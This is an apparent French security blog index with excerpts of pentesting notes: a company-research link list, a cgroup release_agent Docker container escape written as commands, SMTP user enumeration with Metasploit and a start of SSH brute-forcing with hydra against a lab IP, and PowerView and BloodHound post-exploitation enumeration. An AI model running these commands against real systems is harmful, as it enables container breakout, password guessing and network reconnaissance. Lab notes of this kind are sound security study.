Recherche d’entreprises et de business

Entreprises Liens pour la recherche d’entreprises et d’informations sur celles-ci AIHIT AllStocksLinks https://www.aihitdata.com http://www.allstocks.com/links AngelList https://angel.co Annual Reports http://www.annualreports.com Big Red Directory https://www.bigreddirectory.com bikudo https://www.bikudo.com Bizeurope http://www.bizeurope.com Biznar https://biznar.com Bizstats http://www.bizstats.co.uk Bizstats http://www.bizstats.com Bloomberg http://www.bloomberg.com/research/company/overview/overview.asp brandchecker https://brandchecker.com Business Source https://www.ebscohost.com/academic/business-source-complete Bureau Van Dijk http://www.bvdinfo.com Buzzfile http://www.buzzfile.com Canadian Business Research https://www.canada.ca/en/services/business/research.html Canadian Business Resource http://www.cbr.ca Cedar … Continuer la lecture

Sortir d’un container docker

# Sur l'hôte docker run –rm -it –cap-add=SYS_ADMIN –security-opt apparmor=unconfined ubuntu bash # Dans le container mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x echo 1 > /tmp/cgrp/x/notify_on_release host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab` echo "$host_path/cmd" > /tmp/cgrp/release_agent #For a normal PoC ================= echo '#!/bin/sh' > /cmd echo "ps aux > $host_path/output" … Continuer la lecture

Énumération d’utilisateurs avec SMTP

Pour voir la version du serveur SMTP msfconsole use auxiliary/scanner/smtp/smtp_version set rhosts 10.9.0.15 exploit Nous voulons connaître les usagers du système SMTP. ce sont probablement les mêmes usagers que le système msfconsole use auxiliary/scanner/smtp/smtp_enum set user_file /usr/share/seclists/Usernames/top-usernames-shortlist.txt set rhosts 10.9.0.15 exploit Essayer de trouver les mots de passe SSH avec la force brute hydra -t16 … Continuer la lecture

Post-Exploitation

Post-Exploitation Powerview est un script de la suite powershell empire qui peut etre utilisé pour l’énumération après que vous ayez obtenu l’accèes au système. Vous trouvez les scripts utilisés dans cet archive powershell -ep bypass . .\PowerView.ps1 Get-NetUser | select cn Get-NetGroup -GroupName *admin* Énumération avec Bloodhound apt-get install bloodhound neo4j console (neo4j:neo4j) bloodhound powershell … Continuer la lecture